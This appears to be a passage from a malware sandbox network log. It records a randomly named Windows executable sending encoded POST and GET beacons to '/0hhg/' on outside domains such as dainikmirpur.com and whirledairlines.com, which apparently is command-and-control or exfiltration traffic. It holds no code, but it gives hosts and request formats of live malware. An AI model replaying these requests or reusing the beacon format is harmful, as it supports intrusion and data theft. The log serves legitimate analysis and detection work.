                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:38 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advis [TRUNCATED]
                                                                                                    May 2, 2024 08:25:38.690186977 CEST130INData Raw: 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74
                                                                                                    Data Ascii: hnologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.449748192.250.235.3680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:41.138566971 CEST10813OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 36 79 70 6c 4b 64 63 4d 71 73 71 34 6c 34 2b 6c 33 59 73 55 6c 51 68 73 69 78 6d 73 78 38 74 65 79 6c 61 45 7a 73 56 42 68 44 38 61 58 59 71 46 38 62 47 4e 41 32 48 76 38 33 58 53 51 64 36 79 72 73 48 36 57 52 38 53 30 5a 42 71 49 6c 78 4e 31 69 2b 53 41 2b 42 79 6c 72 51 41 31 74 6b 44 4a 73 37 6e 4b 39 76 65 76 32 41 48 4e 42 51 71 6e 65 38 6d 59 7a 4d 4b 32 4b 59 58 33 72 46 79 62 64 46 52 48 35 6c 55 6a 63 4c 43 64 39 75 55 48 67 34 61 39 45 2f 65 79 47 55 4d 55 6b 44 4c 5a 4d 6b 4b 68 42 76 7a 63 36 68 36 61 31 49 64 6a 5a 51 43 6a 49 58 79 41 69 35 56 65 53 45 42 6f 69 64 77 4b 77 55 41 58 58 6f 54 43 43 79 51 4c 30 78 52 42 4e 2f 69 66 71 6d 52 30 66 72 69 75 34 35 78 50 6a 79 79 30 2b 70 37 30 70 69 48 6d 31 38 6c 69 47 35 61 6c 78 34 52 39 54 47 50 63 34 41 64 39 56 32 43 6f 61 63 45 6c 46 2f 75 56 51 66 47 4d 4a 78 72 30 62 79 6b 57 77 73 76 41 62 4e 4c 54 79 6c 43 5a 32 56 44 34 4a 6a 39 32 46 76 50 4b 55 37 64 53 4b 65 72 2b 76 56 58 56 35 52 67 75 68 55 48 34 [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=6yplKdcMqsq4l4+l3YsUlQhsixmsx8teylaEzsVBhD8aXYqF8bGNA2Hv83XSQd6yrsH6WR8S0ZBqIlxN1i+SA+BylrQA1tkDJs7nK9vev2AHNBQqne8mYzMK2KYX3rFybdFRH5lUjcLCd9uUHg4a9E/eyGUMUkDLZMkKhBvzc6h6a1IdjZQCjIXyAi5VeSEBoidwKwUAXXoTCCyQL0xRBN/ifqmR0friu45xPjyy0+p70piHm18liG5alx4R9TGPc4Ad9V2CoacElF/uVQfGMJxr0bykWwsvAbNLTylCZ2VD4Jj92FvPKU7dSKer+vVXV5RguhUH4S/u3Gg4FBVHGARW2/Onx3BcZ0eB2TLQlMonLALQSuQEzSSS6GRRY3GMMqtcTXZU7Y079Ga8qXHFHd0wGovhumFStSupDXXSturp3utucopYtJS6Du947x/y/C0MOYpBeLPqlr8MdUksjt2PRNFo6AyoazygwSdZUiieJJ/9hIecKg706Eiegu4ESbGaVR25qrJ/qeUkd2apLm/uAKtNK9pZuplXgI1ieqjI/2qjyd1iW54qJMmj6pVIpyhOLmKU+k4VaTor/jUMZAizD2mhPOwglXveKyW1HLNBQlvWkrqdKXSkRHz0uWjzT26dq4GOzbcS+qh+ziV1cYIHdiNEVkmMWZ8APwzMnyGB/dyI/hOa/+GmBkUpgIg5h/PrH41DHbMkqFji4aCJSoYlVTOtlVWQQ+jI2AGFGTcLVm+Qbr5ZfEp8jLun89GB/fKFho6SqiuZALNUf+HgMzinz+AmOwTE6gOEMwA+Tewder2DAAdfXIpnRUyXxz4hcPComkWYCwRZuk8o0E74Sq4qsTjSBXyPf0gggmAj8z3PlSfn1xXTXQ+YHZ04E0WMRRglL9DDkk1jykmHvoGhRXQMsf7/ZV8e3mIMU2pDxs2rqy1lfMEYqp21O+fnjgFKDNBU3lbzYeDwpf9kAAzaJWNw/FhSFiRFAELyhnl8+1U [TRUNCATED]
                                                                                                    May 2, 2024 08:25:41.888797998 CEST1289OUTData Raw: 4e 62 48 45 50 30 78 56 54 74 7a 38 6e 53 4b 42 31 4a 4c 34 76 77 35 54 4c 45 48 4a 56 52 66 74 39 56 55 6b 72 5a 74 70 6a 56 35 76 75 69 4d 4f 71 74 56 48 49 7a 34 4a 79 6a 48 73 2b 62 4b 43 6e 2b 6e 4b 5a 35 4a 76 76 36 42 55 54 57 6f 7a 6d 35
                                                                                                    Data Ascii: NbHEP0xVTtz8nSKB1JL4vw5TLEHJVRft9VUkrZtpjV5vuiMOqtVHIz4JyjHs+bKCn+nKZ5Jvv6BUTWozm53cXJ6L7x3QF9oYBzp/GzRI+rrHd9J5/SBuLcEVV4Uq7VcR33zndWHodKG855nN62nBKAZrh/g3W6Etp0waexviSEcGZjoFbc7er7RlvmgS+JHgqfr+LDjEshCNW+1+DUbFQC0ZJW5Rg7O7577XLpjVpJtca6qU/dw
                                                                                                    May 2, 2024 08:25:42.266565084 CEST1289OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 36 79 70 6c 4b 64 63 4d 71 73 71 34 6c 34 2b 6c 33 59 73 55 6c 51 68 73 69 78 6d 73 78 38 74 65 79 6c 61 45 7a 73 56 42 68 44 38 61 58 59 71 46 38 62 47 4e 41 32 48 76 38 33 58 53 51 64 36 79 72 73 48 36 57 52 38 53 30 5a 42 71 49 6c 78 4e 31 69 2b 53 41 2b 42 79 6c 72 51 41 31 74 6b 44 4a 73 37 6e 4b 39 76 65 76 32 41 48 4e 42 51 71 6e 65 38 6d 59 7a 4d 4b 32 4b 59 58 33 72 46 79 62 64 46 52 48 35 6c 55 6a 63 4c 43 64 39 75 55 48 67 34 61 39 45 2f 65 79 47 55 4d 55 6b 44 4c 5a 4d 6b 4b 68 42 76 7a 63 36 68 36 61 31 49 64 6a 5a 51 43 6a 49 58 79 41 69 35 56 65 53 45 42 6f 69 64 77 4b 77 55 41 58 58 6f 54 43 43 79 51 4c 30 78 52 42 4e 2f 69 66 71 6d 52 30 66 72 69 75 34 35 78 50 6a 79 79 30 2b 70 37 30 70 69 48 6d 31 38 6c 69 47 35 61 6c 78 34 52 39 54 47 50 63 34 41 64 39 56 32 43 6f 61 63 45 6c 46 2f 75 56 51 66 47 4d 4a 78 72 30 62 79 6b 57 77 73 76 41 62 4e 4c 54 79 6c 43 5a 32 56 44 34 4a 6a 39 32 46 76 50 4b 55 37 64 53 4b 65 72 2b 76 56 58 56 35 52 67 75 68 55 48 34 [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=6yplKdcMqsq4l4+l3YsUlQhsixmsx8teylaEzsVBhD8aXYqF8bGNA2Hv83XSQd6yrsH6WR8S0ZBqIlxN1i+SA+BylrQA1tkDJs7nK9vev2AHNBQqne8mYzMK2KYX3rFybdFRH5lUjcLCd9uUHg4a9E/eyGUMUkDLZMkKhBvzc6h6a1IdjZQCjIXyAi5VeSEBoidwKwUAXXoTCCyQL0xRBN/ifqmR0friu45xPjyy0+p70piHm18liG5alx4R9TGPc4Ad9V2CoacElF/uVQfGMJxr0bykWwsvAbNLTylCZ2VD4Jj92FvPKU7dSKer+vVXV5RguhUH4S/u3Gg4FBVHGARW2/Onx3BcZ0eB2TLQlMonLALQSuQEzSSS6GRRY3GMMqtcTXZU7Y079Ga8qXHFHd0wGovhumFStSupDXXSturp3utucopYtJS6Du947x/y/C0MOYpBeLPqlr8MdUksjt2PRNFo6AyoazygwSdZUiieJJ/9hIecKg706Eiegu4ESbGaVR25qrJ/qeUkd2apLm/uAKtNK9pZuplXgI1ieqjI/2qjyd1iW54qJMmj6pVIpyhOLmKU+k4VaTor/jUMZAizD2mhPOwglXveKyW1HLNBQlvWkrqdKXSkRHz0uWjzT26dq4GOzbcS+qh+ziV1cYIHdiNEVkmMWZ8APwzMnyGB/dyI/hOa/+GmBkUpgIg5h/PrH41DHbMkqFji4aCJSoYlVTOtlVWQQ+jI2AGFGTcLVm+Qbr5ZfEp8jLun89GB/fKF
                                                                                                    May 2, 2024 08:25:42.269491911 CEST1289OUTData Raw: 68 6f 36 53 71 69 75 5a 41 4c 4e 55 66 2b 48 67 4d 7a 69 6e 7a 2b 41 6d 4f 77 54 45 36 67 4f 45 4d 77 41 2b 54 65 77 64 65 72 32 44 41 41 64 66 58 49 70 6e 52 55 79 58 78 7a 34 68 63 50 43 6f 6d 6b 57 59 43 77 52 5a 75 6b 38 6f 30 45 37 34 53 71
                                                                                                    Data Ascii: ho6SqiuZALNUf+HgMzinz+AmOwTE6gOEMwA+Tewder2DAAdfXIpnRUyXxz4hcPComkWYCwRZuk8o0E74Sq4qsTjSBXyPf0gggmAj8z3PlSfn1xXTXQ+YHZ04E0WMRRglL9DDkk1jykmHvoGhRXQMsf7/ZV8e3mIMU2pDxs2rqy1lfMEYqp21O+fnjgFKDNBU3lbzYeDwpf9kAAzaJWNw/FhSFiRFAELyhnl8+1UGv+5OT3a6do+
                                                                                                    May 2, 2024 08:25:42.650294065 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:42 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please b
                                                                                                    May 2, 2024 08:25:42.650326014 CEST186INData Raw: 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75
                                                                                                    Data Ascii: e advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
                                                                                                    May 2, 2024 08:25:42.650485039 CEST1289OUTData Raw: 65 57 61 43 48 59 42 56 6e 4a 4c 6b 62 2f 78 43 4b 51 61 33 6a 70 30 52 6c 76 6b 4a 51 35 54 4a 63 35 48 58 48 4b 42 38 69 62 71 47 76 74 6e 37 44 68 76 50 45 71 4b 79 2f 78 32 53 5a 4b 65 52 72 43 78 55 48 45 43 36 76 64 70 67 70 61 46 6c 70 4d
                                                                                                    Data Ascii: eWaCHYBVnJLkb/xCKQa3jp0RlvkJQ5TJc5HXHKB8ibqGvtn7DhvPEqKy/x2SZKeRrCxUHEC6vdpgpaFlpMhnbF0ORfDrm7SK+XlTrGViSyRhT5VFWiEMx79bisTaUmw7TREIAMLrCYHcdyOI+NfgFrYLSGVm6Z4SMutgLLmvbg57pDkkvqpJUNcf/U7dOEzJ+0FUQ960MYVwp7JUFOpowTCkX/UUOaRpYdZkwkK5UzTntYgmMg8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.449749192.250.235.3680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:44.979652882 CEST440OUTGET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:25:46.029416084 CEST440OUTGET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:25:46.501485109 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:46 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advis [TRUNCATED]
                                                                                                    May 2, 2024 08:25:46.501523018 CEST130INData Raw: 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74
                                                                                                    Data Ascii: hnologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.449750216.40.34.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:51.846330881 CEST720OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.whirledairlines.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.whirledairlines.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.whirledairlines.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 44 43 37 35 77 2f 4f 47 62 54 48 4f 32 30 31 76 65 4b 72 55 50 4f 56 43 55 63 37 59 45 5a 4f 32 72 50 6b 69 5a 56 4f 54 67 52 45 59 50 31 49 59 4f 4d 37 4f 4c 6a 6c 34 35 5a 65 51 37 2b 63 4d 32 75 46 54 50 68 58 76 2b 45 47 67 6a 42 79 70 73 2b 38 6b 44 59 62 38 6e 6f 4a 61 57 59 43 51 32 2f 76 52 6a 75 32 69 41 6e 6e 34 71 72 47 47 79 4b 36 4d 43 72 73 7a 4e 50 58 71 64 36 71 4a 6a 59 66 52 69 59 50 52 56 77 72 72 38 78 78 4b 34 33 32 2b 79 72 5a 30 72 30 54 53 36 32 5a 55 34 6a 46 65 59 49 4f 56 33 4a 79 6a 66 69 4b 61 67 63 38 4c 30 70 2f 4e 4e 67 6c 6a 46 37 6e 7a 52 51 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=DC75w/OGbTHO201veKrUPOVCUc7YEZO2rPkiZVOTgREYP1IYOM7OLjl45ZeQ7+cM2uFTPhXv+EGgjByps+8kDYb8noJaWYCQ2/vRju2iAnn4qrGGyK6MCrszNPXqd6qJjYfRiYPRVwrr8xxK432+yrZ0r0TS62ZU4jFeYIOV3JyjfiKagc8L0p/NNgljF7nzRQ==
                                                                                                    May 2, 2024 08:25:52.000607014 CEST1277INHTTP/1.1 404 Not Found
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-request-id: 49fe8594-426a-4020-b242-df6d1a61a0d0
                                                                                                    x-runtime: 0.045185
                                                                                                    content-length: 18187
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                    May 2, 2024 08:25:52.000627041 CEST1277INData Raw: 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20
                                                                                                    Data Ascii: ne; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px solid #D9D9D9; background: #ECECEC;
                                                                                                    May 2, 2024 08:25:52.000663042 CEST1277INData Raw: 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 74 68 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74
